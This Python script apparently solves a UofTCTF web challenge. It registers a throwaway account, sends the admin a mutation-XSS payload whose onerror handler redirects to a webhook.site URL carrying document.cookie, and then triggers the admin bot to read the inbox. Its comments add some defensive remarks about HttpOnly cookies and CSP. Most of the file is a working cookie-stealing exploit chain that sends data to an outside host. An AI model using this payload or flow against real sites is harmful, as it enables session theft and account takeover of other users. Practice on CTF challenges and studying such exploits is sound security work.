#!/usr/bin/env python3
"""
Simple single-payload test
"""

import requests
import time
import json

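# Target of the exercise: a CTF challenge instance (hostname as published).
BASE_URL = "https://unrealistic-1-7e47fbb90382563c.chals.uoftctf.org"
# Third-party request-capture endpoint. Anything sent here is readable by
# whoever holds this URL, so treat captured values as disclosed.
WEBHOOK_URL = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"
# requests has no default timeout; without one a stalled challenge host or
# bot run would hang the script forever.
REQUEST_TIMEOUT = 15  # seconds

print("="*70)
print("SINGLE PAYLOAD TEST")
print("="*70)

# Register a throwaway account; the timestamp suffix avoids name collisions
# between runs.
username = f"pwn_{int(time.time())}"
password = "test123"

print(f"\n[1] Registering as {username}...")
resp = requests.post(
    f"{BASE_URL}/register",
    data={"username": username, "password": password},
    allow_redirects=False,  # the Set-Cookie of interest is on the redirect itself
    timeout=REQUEST_TIMEOUT,
)
print(f"    Status: {resp.status_code}")

# A redirect is treated as success. The cookie is checked separately so that
# a missing value is reported here instead of being sent on as a bogus
# "session" cookie in the next request.
registered = resp.status_code in (302, 303)
session_cookie = resp.cookies.get("session") if registered else None

if not registered:
    print("    [-] Registration failed")
elif session_cookie is None:
    print("    [-] Registration redirected but set no session cookie")
else:
    print("    [+] Got session cookie!")

    # Payload kept byte-for-byte as published. The nested
    # <form>/<math>/<mtext>/<mglyph>/<style> markup looks like a mutation-XSS
    # pattern that relies on a sanitizer and the browser parsing the same
    # markup differently; which sanitizer /compose applies is not visible
    # here (TODO confirm against the challenge source).
    # Defensive reading: the onerror handler can only leak a cookie that
    # script is allowed to read, so HttpOnly on the session cookie and a CSP
    # that forbids inline event handlers both limit the impact.
    print("\n[2] Sending XSS payload...")
    payload = f'<form><math><mtext></form><form><mglyph><style></math><img src=x onerror=location="{WEBHOOK_URL}?flag="+document.cookie>'

    resp2 = requests.post(
        f"{BASE_URL}/compose",
        data={"to": "admin", "body": payload},
        cookies={"session": session_cookie},
        allow_redirects=False,
        timeout=REQUEST_TIMEOUT,
    )
    print(f"    Status: {resp2.status_code}")
    if resp2.status_code == 303:
        print("    [+] Message sent!")

        # The /bot endpoint is handed a loopback URL to visit, so it accepts
        # a caller-supplied address. Whether it validates the host or path is
        # not visible here.
        print("\n[3] Triggering bot...")
        resp3 = requests.post(
            f"{BASE_URL}/bot",
            data={"url": "http://127.0.0.1:5000/inbox"},
            timeout=REQUEST_TIMEOUT,
        )
        if "Bot ran" in resp3.text:
            print("    [+] Bot triggered!")
            print(f"\n[!] CHECK YOUR WEBHOOK: {WEBHOOK_URL}")
        else:
            print(f"    [-] Bot error: {resp3.text[:200]}")
    else:
        print(f"    [-] Send failed: {resp2.text[:200]}")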
